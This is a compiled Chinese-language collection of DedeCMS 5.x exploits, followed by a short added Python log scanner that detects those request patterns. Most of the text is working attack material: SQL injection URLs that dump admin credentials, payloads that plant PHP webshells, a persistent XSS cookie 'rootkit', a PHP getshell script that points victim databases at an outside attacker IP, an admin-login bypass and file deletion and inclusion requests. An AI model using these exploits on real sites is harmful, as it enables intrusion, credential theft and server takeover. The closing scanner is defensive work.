Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a software item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After it is published, viewing or editing it executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with the password xiao, writing a one-line shell directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter has to be disabled.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; whichever of the URLs below you then visit, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;

if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;

if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";

}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

This only works once the backend path has been obtained.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the member backend, publish an article and upload an image; then in attachment management replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(crafted here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 characters and the last 7 removed, giving the 20-character MD5 password; then remove 3 from the front and 1 from the end to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits the error raised by a MySQL numeric field overflow, together with the fact that DEDECMS records database error messages into a PHP file whose header performs no validation.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the output from step 2 means the file trojan was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
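An added defensive example, not part of the original post: Python that scans combined-format web-server access-log lines for the request shapes listed throughout this page (GLOBALS overrides via _COOKIE/_POST, the rss.php _Cs array, advancedsearch.php sql=, gotopage XSS, edit_face.php traversal, carbuyaction.php code= traversal, digg_frame.php mid=*/, UNION SELECT). The log lines, client IPs and rule names are constructed for the example.

```python
"""Detection for the DedeCMS request patterns on this page, run over constructed access-log lines."""
import re
from urllib.parse import unquote_plus

# (rule name, pattern applied to the URL-decoded, lower-cased request URI).
# Each pattern mirrors one request shape shown on this page; names are constructed.
RULES = [
    ("globals-override", re.compile(r"_(?:cookie|post|get|request)\[globals\]")),
    ("rss-cs-array", re.compile(r"/plus/rss\.php\?.*_cs\[")),
    ("advancedsearch-raw-sql", re.compile(r"/plus/advancedsearch\.php\?.*[?&]sql=")),
    ("gotopage-xss", re.compile(r"gotopage=[^&]*<")),
    ("edit-face-traversal", re.compile(r"/member/edit_face\.php\?.*dopost=delold.*\.\./")),
    ("carbuyaction-lfi", re.compile(r"/plus/carbuyaction\.php\?.*code=[^&]*\.\./")),
    ("digg-frame-php-inject", re.compile(r"/plus/digg_frame\.php\?.*mid=\*/")),
    ("member-uid-injection", re.compile(r"/member/index\.php\?.*uid=[^&]*(?:'|\|\|)")),
    ("union-select", re.compile(r"union\s+select")),
]

# Apache/Nginx combined log format: ip ident user [time] "METHOD uri PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_uri(uri: str) -> str:
    """Percent-decode up to twice (double encoding is a common filter evasion), then lower-case."""
    for _ in range(2):
        decoded = unquote_plus(uri, errors="replace")
        if decoded == uri:
            break
        uri = decoded
    return uri.lower()


def classify(uri: str) -> list:
    """Names of every rule the request URI triggers, in RULES order."""
    decoded = decode_uri(uri)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(lines) -> list:
    """Return (client ip, raw uri, [rule names]) for each log line that hits a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production scanner should count these, not drop them
        rules = classify(m.group("uri"))
        if rules:
            hits.append((m.group("ip"), m.group("uri"), rules))
    return hits


# Constructed sample log: six requests shaped like the page's payloads, then two benign ones.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2013:10:01:02 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2013:10:01:09 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Mar/2013:10:02:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Mar/2013:10:03:00 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Mar/2013:10:03:30 +0800] "GET /plus/digg_frame.php?action=good&id=1024%651024&mid=*/var_dump(3);?%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [12/Mar/2013:10:04:00 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2013:10:05:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2013:10:05:05 +0800] "GET /member/index.php?uid=%E6%B6%9B%E5%A3%B0 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, uri, rules in scan(SAMPLE_LOG):
        print(f"{ip} {','.join(rules)} {uri}")
```

POST bodies (mytag_js.php, select_soft_post.php and the article_edit.php forms above) never reach an access log, so those cases need request-body logging or a WAF rule rather than this scan.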